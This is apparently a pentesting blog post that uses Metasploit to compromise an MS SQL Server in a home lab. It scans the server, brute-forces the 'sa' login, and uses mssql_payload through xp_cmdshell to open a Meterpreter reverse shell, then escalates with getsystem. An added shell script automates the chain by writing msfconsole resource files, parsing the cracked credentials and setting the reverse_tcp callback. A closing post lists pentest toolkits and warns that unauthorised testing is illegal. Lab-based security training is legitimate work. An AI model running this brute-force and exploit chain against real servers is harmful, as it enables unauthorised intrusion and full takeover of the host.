Attacking SQL Database Server using Metasploit

Aloha,

Let's see how we can use the Metasploit Framework to own an MS SQL Server.

Our Lab:
A MacBook running VMware Fusion
Target: a virtual guest running Windows Server 2003 with the IP address 172.16.226.131
Attacker: a virtual guest running BackTrack 5 R1 with the IP address 172.16.226.128

So let's go…


Commands:

  • nmap -O target

OS fingerprinting shows the target is Windows and that TCP port 1433, the default SQL Server listener, is open. Adding -sV to the scan also reports the SQL Server version banner, which is worth confirming before moving on.

  • mssql_ping (auxiliary/scanner/mssql/mssql_ping)

Setting the RHOSTS option we query the SQL Server Browser service on UDP port 1434 and get information about the instance: server name, instance name, version and the TCP port it is listening on. This is useful when the instance is not on the default 1433, since the Browser service tells us where it really is.

  • mssql_login (auxiliary/scanner/mssql/mssql_login)

Setting the options RHOSTS, USERNAME, PASS_FILE and VERBOSE we brute-force the target for valid credentials. If the server is misconfigured or the passwords are weak we find accounts that we can use in the next step. Here I am attacking the "sa" account. "sa" is the built-in SQL Server login that belongs to the sysadmin fixed server role, so it has full administrative control over the whole instance (it maps to the dbo user in every database). Two caveats: "sa" can only log in when the instance runs in mixed-mode (SQL Server and Windows) authentication, and every failed attempt is written to the SQL Server error log by default, so this step is loud.

[+] 172.16.226.131:1433 - MSSQL - successful login 'sa' : 'password'

  • mssql_payload (exploit/windows/mssql/mssql_payload)

Setting the target and the USERNAME and PASSWORD found in the previous step, plus a payload and LHOST for the callback, we exploit the server. The module logs in, uses the "xp_cmdshell" extended stored procedure to execute commands on the host, and re-enables xp_cmdshell through sp_configure if the administrator had turned it off. The resulting shell runs as the SQL Server service account, which on a default Windows Server 2003 install is often LocalSystem.

[*] Meterpreter session 1 opened

  • getsystem

Inside the Meterpreter session, getsystem tries the built-in privilege-escalation techniques to obtain SYSTEM. If the SQL Server service already runs as LocalSystem this is a no-op; otherwise it is the step that takes us from the database service account to full control of the box.
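As an added example, not code from the original post, here is a small POSIX shell script that strings the four Metasploit steps above together: it writes the msfconsole resource (.rc) scripts for mssql_login and mssql_payload, and picks the recovered credentials out of mssql_login's output so they can be fed to the exploit. The module paths are Metasploit's real ones; the two lab addresses, the wordlist path and the sample scanner output are assumptions constructed for the demo, and the output format parsed is the one the post shows.

```shell
#!/bin/sh
# Added example, not code from the original post: script the mssql_login ->
# mssql_payload chain as msfconsole resource (.rc) files and pick the
# recovered credentials out of mssql_login's output. The module paths are
# Metasploit's real ones; the addresses, the wordlist path and the sample
# scanner output below are assumptions / constructed for the demo.
set -u

TARGET=172.16.226.131      # assumed: the Windows 2003 guest from the lab
ATTACKER=172.16.226.128    # assumed: the BackTrack guest (LHOST for the callback)

# Stage 1: resource script for the brute-force. STOP_ON_SUCCESS stops hammering
# the instance once a password hits; every failed attempt still lands in the
# SQL Server error log, which is what a defender will see.
write_mssql_login_rc() {
    rhost=$1; passfile=$2
    cat <<EOF
use auxiliary/scanner/mssql/mssql_login
set RHOSTS $rhost
set USERNAME sa
set PASS_FILE $passfile
set STOP_ON_SUCCESS true
set VERBOSE true
run
EOF
}

# Stage 2: extract user:pass from the first "successful login" line of the
# mssql_login output (the format the post shows). Exit 1 when nothing hit.
parse_mssql_login() {
    sed -n "s/.*successful login '\([^']*\)' : '\([^']*\)'.*/\1:\2/p" \
        | head -n 1 | grep .
}

# Stage 3: resource script for mssql_payload with the recovered credentials.
# The module drives xp_cmdshell (re-enabling it through sp_configure if it is
# off) to drop and run the payload, so the shell comes back as the SQL Server
# service account. Older (Metasploit 4 / BackTrack 5) builds call the target
# option RHOST instead of RHOSTS.
write_mssql_payload_rc() {
    rhost=$1; lhost=$2; user=$3; pass=$4
    cat <<EOF
use exploit/windows/mssql/mssql_payload
set RHOSTS $rhost
set USERNAME $user
set PASSWORD $pass
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
exploit -j
EOF
}

# Constructed sample of mssql_login console output, in the post's format.
SAMPLE_LOGIN_OUTPUT="[*] 172.16.226.131:1433 - MSSQL - Starting authentication scanner.
[-] 172.16.226.131:1433 - MSSQL - failed login 'sa' : 'admin'
[+] 172.16.226.131:1433 - MSSQL - successful login 'sa' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)"

# Usage (wordlist path is an assumption, adjust to your box):
#   sh mssql_chain.sh login > mssql_login.rc ; msfconsole -q -r mssql_login.rc
#   sh mssql_chain.sh payload login_output.txt > mssql_payload.rc
# then msfconsole -q -r mssql_payload.rc and, once the session opens,
# "sessions -i 1" followed by "getsystem".
case "${1:-}" in
    login)
        write_mssql_login_rc "$TARGET" /usr/share/wordlists/rockyou.txt ;;
    payload)
        creds=$(parse_mssql_login < "$2") || { echo "no valid login found" >&2; exit 1; }
        write_mssql_payload_rc "$TARGET" "$ATTACKER" "${creds%%:*}" "${creds#*:}" ;;
esac
```

Keeping the two stages in separate resource files means the noisy brute-force can be run once, reviewed, and only then followed by the exploit with exactly the credentials it found.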

I am working on a new post about Meterpreter, so stay tuned…


Pentesting ToolKits and Targets

Aloha,

Here we go.

We need knowledge, we need tools and targets, and we need a lab environment.

It is illegal to run penetration tests against live environments without the written permission of the owner, so a test environment is a must-have. In another post I will go through how to build a lab environment; for now, here is a list, in no particular order, of toolkits and targets. Luckily there are plenty out there!

This list will be updated over time.

Penetration Toolkits
These are live CDs or DVDs. I am not going to analyze any of them right now. I am using the BackTrack Linux distribution, probably because it is the first one I started with, or…

Targets
These are live CDs, projects or vmdk files. You can use them to develop and test your pen-testing skills.